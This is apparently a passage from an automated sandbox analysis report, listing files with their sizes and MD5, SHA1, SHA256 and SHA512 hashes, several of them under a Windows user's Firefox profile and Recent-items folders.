SHA512ae4b5755cc5e5097eae069a7419d40dec1f109f549e24194c81b01016462d07aafebcc04c0bfbd913dea8d41cd63f44aca8f79013f4fd0c4d8f89b81d05113eb
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
9.7MB
MD5d31ae263840ea72da485bcbae6345ad3
SHA1af475b22571cd488353bba0681e4beebdf28d17d
SHA256d4717111251ccd87aed19d387a50770f795dda04d454a97ebe53b27ea3afe1fb
SHA5124782b25ed7defe2891e680fbc0e0557b8212f6309e26f7cb6682f59734fe867cca9f1539dbcb33f5c500ae85c0b06af0e4d45480f296f43fbf3a695dd987b45c
-
Filesize
429KB
MD5d8a7d8e3ffe307714099d74e7ccaac01
SHA1b0bd0dc5af33f9ee7f3cad3b3b1f3057d706ad77
SHA256c5b5c385184b5c2d7ed666beb38bb10b703097573f7a6b42b7fdef78acf99c96
SHA512f46755b7f31d0676f68a97912d031b8354d500ddaed5f60eb10929d861730b5b2d4ba3f67a3141c10d4706c018f58eb42e34e33f70fa90efcabee2ef2cd54631
-
Filesize
1.7MB
MD54c265993ba0bccec886a5bde97daef83
SHA1c85ca0619dac8b5fff735fb069ebebd85a156a54
SHA25697ee6251a4c5471cf4018fc89b44cae101c40950ef8c1010c7376da805d3673b
SHA512f5fb4fa2705b9031e86700c1c2151bc770191ac7a51456adc4673ce776e4ac63ee247c03710f903352611e7df74f655427a6eb69c901f1dafb76ea2e0dd5ed0f
-
Filesize
2.0MB
MD54bf1ceb25a2893275cbdbd4026e51b28
SHA1fe60d4df8f1f6b682ccae4df0d48d1662c8aa8e1
SHA2562063f2c03a2d00224f42942762a5535ce767cd722b5e93cbae5c55cc9c92e255
SHA512de068b35bc94bf8c7a057fe3fa579cccb98cd69b63586604dc1aacc6f6bcb558904703a0e036f2094ea93e885c8334bd33a8571a6343ebb5ad702ccd22c45984
-
Filesize
5.8MB
MD5501080884bed38cb8801a307c9d7b7b4
SHA1881b250cc8f4fa4f75111ac557a4fde8e1e217af
SHA256bf68cf819a1e865170430c10e91c18b427aef88db1da1742020443864aa2b749
SHA51263d74a4871d1c72c2a79ae8a5d380070f9d2128c16949c3ad36c9862fcc4dab738137ed3d51caf0bc46b36655f8bd8a2d425d68200123415ee8d4de0e1cbebc9
-
Filesize
4B
MD5365c9bfeb7d89244f2ce01c1de44cb85
SHA1d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1
-
Filesize
3.3MB
MD55da2a50fa3583efa1026acd7cbd3171a
SHA1cb0dab475655882458c76ed85f9e87f26e0a9112
SHA2562c7b5e41c73a755d34f1b43b958541fc5e633ac3fc6f017478242054b7fe363a
SHA51238ed7d8c728b3abaa5347d7a90206f86cc44cf2512dae9d55a8a71601717665ece7428cbecb929a1c79a63cc078c495c632791d869cc5169d101554c221ddae7
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
6.5MB
MD5438c3af1332297479ee9ed271bb7bf39
SHA1b3571e5e31d02b02e7d68806a254a4d290339af3
SHA256b45630be7b3c1c80551e0a89e7bd6dbc65804fa0ca99e5f13fb317b2083ac194
SHA512984d3b438146d1180b6c37d54793fadb383f4585e9a13f0ec695f75b27b50db72d7f5f0ef218a6313302829ba83778c348d37c4d9e811c0dba7c04ef4fb04672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ca08f413248038f12237f357e2363490
SHA179ff0e6481a64b98781e8c51df1f356bda7897cd
SHA256fbc5a675ce3135e68c59272fbfe030b5ecc6ed884e4670eeda84e2dcc15096cb
SHA5128a952bd75b92255926385b091c434af8232b191e81abec68f251094a7cf7c9a386afada2a0b5981d69670cac58824476b49b20bc19049539be09fa6e0647c8b7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XEY00GW2PXJEN6P82618.temp
Filesize7KB
MD5b5edc57bcedc85cb78d697835cd515a8
SHA11abd1bcb1564b85c3fc512bd4c11e68b24dd15f2
SHA25608ff1a8b2d76c80474fc834b434a67b9aa39d4b22159dc6a827ddbfe9dae6dfd
SHA5120a71449f8959f390b19eff2189f64522774c4a2bb483a45d1492c3cc0401fac5bb716a37159ab8efe91196af20e0d163960c2ca1575025704c3b1af85726faf7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5cc4217f3d6ba77f0fb4622a90cd304a2
SHA1ec6e4a398380a64c22a5f26d99661786be9be096
SHA2561fa6af35a4210de6a4efb6195696bd87a472f5dd7fef546572f9ee88107edb1a
SHA512e92f08f04d50e8c6316bb47b6d0ac7396ff36aaf8988a2aaa071334b3dbaae7641f256ac72c18954b02b07f83ca48ae7c067dad7321ab6ba91745684915ae13c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\36da3545-3aac-45ef-8f47-3d50335a47ab
Filesize11KB
MD5e1200d21ef03249b34734c75585e3350
SHA1873d1feb06fdf5acba56286dd34ae99f4a86a947
SHA25691309b94174ab3e0cdd010bb853b200bb6d1f5e92805883c3a79365c793b3ee9
SHA512b0a7a07aee5877b2e09384f05f30d0298676313ff515238c5d963fd126cbc6713b1a10359fc3dc88a0af281aaf646e1ef38c39bdf23743eef54ea6509c7416d8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\9ed073a8-caa3-4c0e-883d-5334809b8a6e
Filesize745B
MD548dcb1daa425ca86ed108f848c64a547
SHA1ab15773dab2b284fddd2319b116720b36d274516
SHA25621b012ed3dccc33ee29fc7335fd46f5c867ba17eb8f98d8136b2e978a2707d6f
SHA5128b258219d7364f86673ba95c72169e6af654b7171351ee5cb8355e7a54f3e0db8b4136547d16b80d0b38275de55e6397bfdc27cbe082b9844a89bd274b345916
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
Filesize
7KB
MD517d71b71148acd9d21b93b67a863c951
SHA19a2cd9005e50167ff3d28a4fe1c475a742db4572
SHA2566c5e27138d0141af1012aef2e122a3ae861ed62693ee63421f4f9a650636dcd5
SHA51220fc4a7e005560756907038be1a7b73bc42ec4b1bff80ca5619f047a467eb6e73c0bfb60cd360899b0cd2c5f29aad9e609b1b98506365a1a22d9824c7f1a7871
-
Filesize
6KB
MD5e1e5bf1dee1cb2245c06a3518f0bf685
SHA1d6bc2d49394c650e14e26fb99332013e3a203170
SHA25681b76f417b575e62c8c4c3717183fba153b9324caee03c099930e2e5635dd1d7
SHA512cbffcc36796dbb488eda0754a02828ed32aa17afddd1b88a4f1750276fbb55fc22cde976703b0a263065af64fbc186eef8862bf0b2a540d97312dda29b61f3a2
-
Filesize
6KB
MD5ac2294358e93b78e8cbc55601cb1f083
SHA1c7d0f12bacfe407799ed0e80003a0470ee1a7bd5
SHA256ae3f8d1d82c2ed1edd6da0d55372d9d0819744eb431c1e2be5e638f62e3efbf8
SHA512a65c1e2ae648889c241cc40726bbe5d41567a5716e2bc5354f97b190ac7aab371b0e355783a3c737dd8b2ab3355114ccc66fb9594f33b8ce28ec295ed26ba87a
-
Filesize
6KB
MD5f037c9dc9e802c7d7978c139ad4af979
SHA1cb5a2907856ff68fad023caf1bb023b7b2d2c2cb
SHA2564fd7dbc87dba3bd619c803c5b867771af4b80232a8dd08cbdae0c7343b5630d8
SHA512e0524c90dff228e45b4440a1346c796fb74e0ac72f2f490f096762a383517b64bf22f4bec4566f0cd7707491e4740738a891a498675c0eb03d39af611d34a14b
-
Filesize
6KB
MD5d65fff237ccd6a4a8822f0917209c818
SHA13007393b8ad72ff7cf76b99a05e58a19b36a1763
SHA25607e370af2224cc6ffcbca20aac5264075816a6e26803556929d0879f766a27a6
SHA51203f409a985e90db94a09a53c6dd23a7f6887e563132e5d71eba8c868890e6261e1a0c34ac7b7a18046a808671585d5be095af31171c6545c56c0ed387f6a398e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5ec037ddc19e48201c8efc8b8e39d5dee
SHA117b01fd6e219946442d3f9c97509e36c49982d8d
SHA256bed8126c937f91eaee055f666979f76223e62e08acc7b9676e2853cfedbe41b9
SHA512863689166aae5311adeeda9b4ceb5e1caa94bb7f30c45b79aa1fb153bd226ac99b0213502976a5f71c038340ab174a94442124bbca749ff2b314785b8a218db3
-
Filesize
446KB
MD54d20b83562eec3660e45027ad56fb444
SHA1ff6134c34500a8f8e5881e6a34263e5796f83667
SHA256c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1
SHA512718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4
-
Filesize
6.1MB
MD5dc3622e6b86ca86f0f91f56c8dae03ec
SHA176486e21d40269ba73f15a4420e3a09459814b56
SHA2560422bb9a0eb5401ce59b234ac8de4a28f74616b75cca0cd97ebf16fc2632aaf4
SHA5123759b718108b74be94b3e61a310baf1a5f010f33f389c8fb3a19b5b8e0d34471e51092a50688b958039eb4bc300ea0d814608fbaa7f95876eb953bd8faff153b
-
Filesize
3.8MB
MD517f13fc530bc52f8d837689a67b8962a
SHA1e332280450bb598dd077c17a83165ef5e1521614
SHA256ed48b6b1dea8a414989055de0987c9dff063e456b2fab2d06b48f1fe0a660b10
SHA51259d7153ee618bc965fc51ff8ef74f33c246bc503243b4c52a42bded2ab0ddd9fdac6cbfa6babe5330bff2d29252ef6f3fe575f63a69b6080b258cc20ebce7f71
-
Filesize
2.0MB
MD543f71f2a16b258ba3be34d837c0f43ca
SHA110f08b185515267fd1d5d90a395d7fdfc598e9b9
SHA256783dbbb3db6748a2f20364ca4a7803893432316933e7cb1af059bc225e1b4d23
SHA512057c62d80b22ce9e3c15c5076cb1d21c06f55710a95ef8a4bae3ae2a12fdadab78ef9e85fe78ede794e4232102b28c1e2834eb9d5e3428082d6e29eb99e48828